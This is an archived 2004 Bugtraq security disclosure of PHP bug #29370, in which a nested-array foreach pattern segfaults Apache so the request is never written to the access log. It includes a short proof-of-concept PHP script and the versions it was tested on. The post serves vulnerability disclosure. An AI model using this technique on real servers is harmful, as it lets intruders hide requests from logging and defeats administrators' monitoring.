[PHP Bug] How to hide a HTTP request in the apache logs

From: Anthony Debhian (anthony.debhian_at_only-for.info)
Date: 08/07/04

  • Next message: Matt Venzke: "Airpwn & libpng holes"
    Date: 6 Aug 2004 23:25:16 -0000
    To: bugtraq@securityfocus.com
    
    
    ('binary' encoding is not supported, stored as-is)

    Author: Debhian ( anthony.debhian -AT- only-for.info )
    PHP Bug #29370

    Description:
     With a certain code, PHP causes a segfault in Apache and the request is not logged.
     This bug (under Windows) causes an error fatal of apache BUT the server is not stopped with this code.
     The bug seems to work on all config (php4 / php5 && windows / unix)
     

    Tested system:
     Windows / Apache 1.3.31 / PHP 5.0.0
     Windows / Apache 1.3.27 / PHP 4.3.3
     Linux / Apache 1.3.24 / PHP 4.2.1

    Proof of concept:

     <?
     function funcfunc($array,$space="")
     {
      foreach($array as $key=>$value) { if(is_array($array[$key])) { $src.=$key; } }
      return $src;
     }

     function funcfunc2($array,$test)
     {
      foreach($array['test'] as $key=>$value) { }
      return $array;
     }

     $test['debhy']['debhou']="test1";
     $test['debhian']['debh']="test2";
     $array=funcfunc($test);
     $array=funcfunc2($array,"test");
     ?>

    Solution:
     The php team has not answered the posted bug yet.


  • Next message: Matt Venzke: "Airpwn & libpng holes"

    Relevant Pages

    • Re: Apache and php to show http request headers.
      ... Apache/PHP on ubuntu to display the http request headers. ... application proxy forwards http requests to the apache server's IP ... I have a php script to dump the headers as follows: ...
      (comp.lang.php)
    • Re: Apache and php to show http request headers.
      ... Apache/PHP on ubuntu to display the http request headers. ... where 192.168.40.1 is the apache server. ... I have a php script to dump the headers as follows: ...
      (comp.lang.php)
    • Re: Apache and php to show http request headers.
      ... Apache/PHP on ubuntu to display the http request headers. ... application proxy forwards http requests to the apache server's IP ... I have a php script to dump the headers as follows: ...
      (comp.lang.php)
    • Re: Apache and php to show http request headers.
      ... Apache/PHP on ubuntu to display the http request headers. ... application proxy forwards http requests to the apache server's IP ... I have a php script to dump the headers as follows: ...
      (comp.lang.php)
    • Re: Apache and php to show http request headers.
      ... Apache/PHP on ubuntu to display the http request headers. ... where 192.168.40.1 is the apache server. ... I have a php script to dump the headers as follows: ...
      (comp.lang.php)